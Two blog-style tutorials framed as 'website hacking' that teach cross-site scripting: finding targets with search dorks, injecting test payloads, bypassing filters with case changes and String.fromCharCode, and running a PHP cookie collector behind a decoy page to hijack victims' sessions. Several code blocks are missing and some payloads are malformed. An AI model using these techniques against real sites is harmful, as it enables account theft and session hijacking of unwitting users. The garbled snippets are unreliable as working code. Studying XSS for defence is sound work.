XSS Complete Tutorial Website Hacking

XSS Complete Tutorial Website Hacking

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability

What is XSS?

Cross Site Scripting also known as XSS, is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.

In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.

Quote:Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.

It will be easy to understand XSS , if you have the following prerequisite:

• Strong Knowledge in HTML,javascript(Reference).
• Basic Knowledge in HTTP client-Server Architecure(Reference)
• [optional]Basic Knowledge about server side programming(php,asp,jsp)

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use google dork for finding the vulnerable sites for instance "?search= or ".php?q= . 1337 target specific sites instead of using google search. If you are going to test your own site, you have to check every page in your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.

[url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOtE50bWRA13gX0q8KR0ryrxYgUOzXRJ_nEmoYYcggIet3kpjr58AFn2mXt433TFMxf63UeBoll18q48ZHzzosUnrvsUZNCDnamRlKXtL2m3dsv9hns54qSILubjvfq2I0M0esFoakLK4/s1600/search+box.jpg"imageanchor=1][/url]

Test 1 :
Once we found the input field, let us try to put some string inside the field, for instance let me input"BTS". It will display the result .
[url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJLmhAlzkKzv-T8H-uDec0g3VBgEwNMeULTEdlg0oh7N6LFy7AICj3MbFVJdd2mvcR4p9d-me5Dt-s4L9EzKz1FwHFH8h_589zApxkOkBmfdM1XtYOGzPKK5EoK8QUukQL3vBdXizjGvE/s1600/XSS_input.gif" imageanchor=1][/url]

Now right click on the page and select view source. search for the string "BTS" which we entered in the input field. Note the location where the input is placed.
[url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-owWzXHgLvkOR784x0zKcqLZSxEB6qJqavey0GrjY5GcvjLg8-0IvlGFxpUqkxLNCd0vcvAKRg81etVjAyj58-OXDaQL5mKlPBlKh4hxipB1_0-UNNKsfxyrZKDk_CmaJeUYf3PmuBhY/s1600/BTS_XSS.gif" imageanchor=1][/url]

Test 2:
Now we are going to check whether the server sanitize our input or not. In order to do this , let usinput the <script> tag inside the input field.
[url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVX-RJlrVTvktzkOPrho4MfqaVQYbmdG2jjvRHir6_iObEy9XW8dN4E4NXe2MEzicU0cxbHYcvWq3ZvFBIDftkvwPLFxdqzpPiZUXH2EUq9AiTosloa_wMQSJEb19lf7h96prJS-gk_lY/s1600/Xss_script_tag.gif" imageanchor=1][/url]
View the source of the page . Find the location where input displayed place in previous test.
[url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-FwMdYMX1c_C2sW1H8mBbOKZgMZ7B_gAE6zdmOadbXhFC1_4exufo_WcEqUAonA0OF6XuzynZe3lUtrcXIprYcNRPaLcrnqm2zs2TQiidTz5m7iWyS7OFoVmK1vZJdDNePUTsBIrs6WA/s1600/xss-SUCCESS_Noparsing.gif" imageanchor=1][/url]

Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this <script>. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack. But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code. 

Code:

For instance, let us input<script>alert('BTS')</script> .

[url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu5OQT8wH6LCK4s2QhvgrspSpcf0PDWM9Bsdn_IArLPmaDE0tVrbfJRQX6LF6yIm7DAj-IYFJXRW8TfX6RKQ3WPRtAsb7wV12GxCU7MTH1dKESsz3b5brcK3eobCbuFO9Oj7hw05MQ3AU/s1600/injecting-XSS.gif" imageanchor=1][/url]

Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS . By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.
[url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL9V3dEwtZfYlXVNQkLYdDhfud5jLMb_JTkKal4OOcyqFcPTSKcAluqGVvHzKpd_VNHxSQz0yfbevmg9nH35Pq8avY_l89Ht6MRxpzm0WRgsfICXf2RxmRLU4ERxa36PP8o5mEIhgUK_M/s1600/alert-box-xss.gif" imageanchor=1][/url]

Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example: 
Many websites host a support forum where registered users can ask their doubts by posting message , which are stored in the database. Let us imagine , An attacker post a message containing malicious javascript code instead. If the server fail to sanitize the input provided, it results in execution of injected script. The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest. The server embedd the input with the html file and return the file(HTTPResponse) to browser. When the browser executes the HTML file, it also execute the embedded script. This kind of XSS vulnerability frequently occur in search fields.

Example:
Let us consider a project hosting website. To find our favorite project, we will just input the related-word in the search box . When searching is finished, it will display a message like this "search results for yourword " . If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser. The browser then executes the code .

In addition to these types, there is also third type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

What can an attacker do with this Vulnerability?

• Stealing the Identity and Confidential Data(credit card details).
• Bypassing restriction in websites.
• Session Hijacking(Stealing session)
• Malware Attack
• Website Defacement
• Denial of Service attacks(Dos)

Read more ...

Complete Cross Site Scripting Walkthrough

Complete Cross Site Scripting Walkthrough

Introduction
'XSS' also known as 'CSS' (Cross Site Scripting) is a very common vulnerability found in Web Applications, 'XSS' allows the attacker to inject malicious code , the reason of that is the developer trusts user inputs, or mis filtering issues ,then send back user input data to the client browser so the malicious code will execute.

XSS is Dangerous
XSS is really dangerous , it's severity is High, because it could change the website DOM and could lead to stealing credentials of the administrator , in these cases the attacker can control and compromise the whole application.

What does the attacker want to achieve?
• Changing Setting • Cookie theft
• False Advertising
• Steal a Form Tokens to make CSRF Easier
• And more , you have to be creative to exploit XSS.

XSS Type
There are Three Types of XSS
• Persistent (Stored) XSS ◦ Attack is stored on the website,s server
• Non Persistent (reflect) XSS ◦ user has to go through a special link to be exposed
• DOM-based XSS ◦ problem exists within the client-side script we will discuss each kind of these in details , as you will see.
Persistent (Stored) XSS
wikipedia definition :The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read. Simply Persistent XSS is occurs when the developer stores the user input data into database server or simply writing it in a file without a proper filtration , then sending them again to the client browser.

Persistent (Stored) XSS Demo
Here is a PHP code that suffers form Persistent XSS:

The two parameters in that code “message” and “name” are not sanitized properly ,the ,we store these parameters into the guestbook table, So when we displaying these parameters back the client browser, it will execute the malicious JavaScript code. For Demonstrating this we will exploit DVWA application.

After Submitting this form , Our JS code has been executed

Non Persistent (Reflected) XSS 

The non-persistent (or reflected) cross-site scripting vulnerability is by far the most common type. These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to generate a page of results for that user, without properly sanitizing the request. 

Non Persistent (Reflected) XSS Demo 

Here is a php code that suffers form Reflected XSS

AS you can see that the “name” parameter doesn't sanitized and echo back to the user , so when the user inject a malicious JS code , It will execute. Now we will inject our malicious js Code , For demonstrating we will inject

<script>alert(/xss/)</script> For Demonstrating this we will exploit DVWA application

will inject an alert box Code “<script>alert("xss")</script>”

DOM based XSS 

DOM-based vulnerabilities occur in the content processing stages performed by the client, typically in client-side JavaScript. The name refers to the standard model for representing HTML or XML contents which is called the Document Object Model (DOM) JavaScript programs manipulate the state of a web page and populate it with dynamically-computed data primarily by acting upon the DOM. simply that type occurs on the javascript code itself that the developer use in client side for example "A typical example is a piece of JavaScript accessing and extracting data from the URL via the location.* DOM, or receiving raw non-HTML data from the server via XMLHttpRequest, and then using this information to write dynamic HTML without proper escaping,entirely on client side." 

DOM based XSS Demo 

Suppose the following code is used to create a form to let the user choose his/her preferred language. A default language is also provided in the query string, as the parameter “default”. we will use the following code for demonstration purposes:

The page is invoked with a URL such as: http://www.some.site/page.html?default=French A DOM Based XSS attack against this page can be accomplished by sending the following URL to a victim: http://www.some.site/page.html?default=<script>alert(document.cookie)</script>

The original Javascript code in the page does not expect the default parameter to contain HTML markup, and as such it simply echoes it into the page (DOM) at runtime. The browser then renders the resulting page and executes the attacker’s script: alert(document.cookie) 

Now we've discussed all types of XSS , so lets talk about some advanced techniques. 

Advanced Techniques there are some avoidance Techniques can be taken to protect a against XSS exploits but they are not implementing well for example : 

Tons of sites may seem vulnerable but not executing the code that occurs because some kind of filtration methods and those may can be bypassed ,we will demonstrate most of them. 

METHOD 1 : replace <script> with null string""

here is the vulnerable code that suffers from reflected xss , that has a filtration : 

As you can see ,in the previous code , the developer replace the string that called "<script>" with a Null string"".

Some common method to bypass filteration is that you just have to replace the string "<script>" With "<SCRIPT>" because the developer search for lowercase of "<script>" , so we bypass

it by change our script to <SCRIPT>.......<?SCRIPT> 

Here is an other way to bypass the previous filteration

<script type=textjavascript>alert("XSS")<script>

Please note its bad practice to use alert("XSS") to test for XSS because most of known sites block the keyword XSS before.

METHOD 2 :

magic quotes filtration in this Technique , the developer uses technique that called magic quotes filtration ,by using 

a PHP function called "addslashes()" that add slash before any special chars. So Our traditional 

JavaScript code doesn't work

here are many ways to bypass that filter , we will discuss two of them 

1- the easiest way to bypass it is Just DONT USE magic quotes simple is that , for example 

declaring a variable and assigned , it to a number , then alert that variable. 

AS you can see here:<script>var val=1;alert(val)</script>

2- this way is some what tricky , in this way we use a built-in Function that convert Decimal values 

into ASCII values , you can find a complete table of ASCII here http://www.asciitable.com/ 

this will help you write what you want OR you can use hackbar firfox add-ons to help you on 

converting ASCII to decimal In my examples ill be writing "XSS" this is the following code 

"120 115 115", Ok we now got the Decimal value of our string,we need to know what function I

n javascript converts this to ASCII this function called "String.fromCharCode()",and to use this with 

alert as example , you dont need to use quotes any more.

<script>alert(String.fromCharCode(120,115,115)</script>

Ok now this will display or message in this case "XSS", this method is very useful for bypassing magic quotes.

How Can an Attacker Steal cookies? 

At first glance you hear about Stealing Cookies , you may think it need a hard work to 

implement or even to understand , but i tell you that is so simple , just you will need 

some programming background and XSS Vulnerability ,Simple is that . 

the Scenario of stealing cookie is that , We will create a PHP file called collect_cookie.php 

then we will upload it to any webhosting company , after that we will inject a java script 

code that will send Cookies to our malicious website , When the php file recieve the 

Cookie information , it will save it in afile called stolen_cookie.txt 

To can steal cookie , we need to some issues : 

• A PHP Script that will recieve the cookie 

• the javascript code that will steal the cookie and send it to our malicious site 

• a web hosting company that will host our php file 

First : collect_cookie.php 

Here is the PHP script that will use, to collecting Cookie and save them into stolen_cookie.txt

So lets understand what the script will do : 

$collectedCookie=$HTTP_GET_VARS["cookie"]; 

in this line we will store the data that is stored in a get variable called cookie then

store it in avariable called collectedCookie 

$date=date("l ds of F Y h:i:s A"); 

here we store the date of the connection Occurs , it tells us when these cookies have been stolen.

$user_agent=$_SERVER['HTTP_USER_AGENT']; 

here we store the user_agent of the victim for further attacks if it needs to. 

$file=fopen('stolen_cookie.txt','a'); 

here we create a file called stolen_cookie.txt that has victim's cookie information

fwrite($file,"DATE:$date || USER AGENT:$user_agent || COOKIE:$collectedCookie \n"); 

here we save the data as this format (“DATE: || USER AGENT || COOKIE”) 

fclose($file); 

her we close the file handle 

echo '<b>Sorry , this page is under construction</b></br></br>

Please Click<a herf="http://www.google.com/">here</a> to go back to previous page '; 

here we print message on the screen (“Sorry , this page is under construction”)

and give him a link to click on it that send it to google. 

Here we have finished the first filecthat will collect the cookie information 

Second : javascript code 

Here is the JavaScript code that we will inject into the victim server or browser. 

We can inject any one of these scripts :

this script need user interaction because it print a link to the user , if the user 

clicks on that link ,the redirection to our site with the cookie information will be 

Done.

This script doesn't need user interaction ,here we will inject an iframe in the 

victim website and it's hidden so the victim can't see that ,and the connection 

will be done. 

Finally we will find the cookie by browsing the file that called stolen_cookie.txt

Read more ...